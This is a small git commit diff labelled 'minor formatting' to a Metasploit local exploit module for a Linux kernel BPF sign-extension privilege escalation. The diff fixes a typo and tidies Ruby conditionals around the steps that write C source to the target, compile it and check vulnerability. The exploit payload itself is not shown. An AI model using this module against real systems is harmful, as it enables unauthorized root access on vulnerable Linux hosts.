minor formatting
parent
1371684df7
commit
8b220e3bad
|
@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'Description' => %q{
|
||||
Linux kernel prior to 4.13.0 utilizes the Berkeley Packet Filter
|
||||
which contains a vulnerability where it may improperly perform
|
||||
sign extentension. This can be utilized to priv escalate,
|
||||
sign extension. This can be utilized to priv escalate,
|
||||
this module has been tested on Ubuntu 16.04 with the 4.4.0-116
|
||||
kernel, and Linux Mint 18 with the 4.4.0-116-generic kernel.
|
||||
},
|
||||
|
@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
write_file("#{file_path}.c", file_content)
|
||||
register_file_for_cleanup("#{file_path}.c")
|
||||
output = cmd_exec(compile)
|
||||
if output != ''
|
||||
unless output.blank?
|
||||
print_error(output)
|
||||
fail_with(Failure::Unknown, "#{filename} at #{file_path}.c failed to compile")
|
||||
end
|
||||
|
@ -92,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
|
||||
if check != CheckCode::Appears
|
||||
unless check == CheckCode::Appears
|
||||
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue